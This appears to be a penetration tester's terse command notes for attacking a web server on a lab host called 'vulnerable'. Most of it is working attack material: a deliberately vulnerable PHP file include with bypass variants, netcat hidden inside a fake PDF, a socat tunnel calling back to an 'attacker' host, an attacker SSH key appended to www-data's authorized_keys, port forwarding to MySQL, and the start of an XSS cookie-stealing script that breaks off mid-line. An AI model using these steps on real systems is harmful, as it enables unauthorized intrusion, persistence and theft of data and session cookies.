Web COmmands
telnet vulnerable 80 GET / HTTP/1.1 Host: test
openssl s_client -connect vulnerable:443
perl nikto.pl -h http://vulnerable
<?php
include("header.php");
include($_GET["page"]);
?>
Can add parent directories include("includes/".$_GET["page"]); file extension include($_GET["page"].".php"); sanitised include(basename($_GET["page"])); or all three include("includes/".basename($_GET["page"]).".php");
upload nc disguised as PDF echo "%PDF-1.4" > pdfheader cat pdfheader nc > nc.pdf
upload file then extract using the include vulnerability tail -n +2 nc.pdf > nc
USING socat trying to access firewalled SSH server on port 22 using redirection on our system on port 2222 socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr
port 443 needs to be in 1st position since its the port vulnerable will try to connect first on vulnerable machine
while true; do socat TCP4:attacker:443 TCP4:127.0.0.1:22 ; done
then try to connect to remote system ssh localhost -p 2222 but dont have www-data's password so have to set SSH keys on remote server ssh-keygen -P "" -f vulnerable [f is filename] then send files over nc session
nc -l -p 81 uname Linux grep www-data /etc/passwd www-data:x:33:33:www-data:/var/www:/bin/sh mkdir ~www-data/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC775KzgLNyNGMHt+R2WJtCTzPSgG5JFZZhTsqu3WaKv1DzAgaLzig3+OQNnKiOQ7R1qSqciOfbK3IqvYKelEg3dhngJqu2Wxrv5TCadCcJL2/RC7GME5+In3V1H9OAksuPG1dsOOoMFbfeM7JvLwDYwk6UJ6FyqVMdxxqf4fkJzxs9griQ5r5V0rG0gM7mUxc7gvxME3XCtOjmGv5MP49yCPNa9auOrclLl64P7QWQw4G5YpdD32CdQBXc4T9IkS3XeRtNNP4oN8dmPBzUFSa8P5OaA/jGpqX73DiQXd9rtwE9i1jMo8UXLt2SCCy72NudMNwshMOshXFWkVy4TDTh root@kali109" >> ~/.ssh/authorized_keys
then connect!
ssh localhost -p 2222 -l www-data -i vulnerable The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. RSA key fingerprint is 67:58:ab:3c:de:34:15:1b:4b:bb:d7:48:df:34:c1:75. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686
Now we have SSH we can easily do port redirection - for example an MySQL server ssh localhost -p 2222 -l www-data -i vulnerable -L 13306:localhost:3306
checking mysql connection mysql -h localhost -u root -P 13306 ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) root@kali109:~# telnet localhost 13306 Trying ::1... Connected to localhost. Escape character is '^]'. ? 5.1.63-0+squeeze1Obkpsr`i�|=Uvs^^>Y&N6
Also can use this server as a socks proxy (ssh -D) or use sshfs to mount comrpomised systems filesystems
#XSS
Check by seeing how chracters are encoded i.e 1337'"><
Trying to get victims cookie
<script>document.write('socat TCP_LISTEN:80,reuseaddr,fork -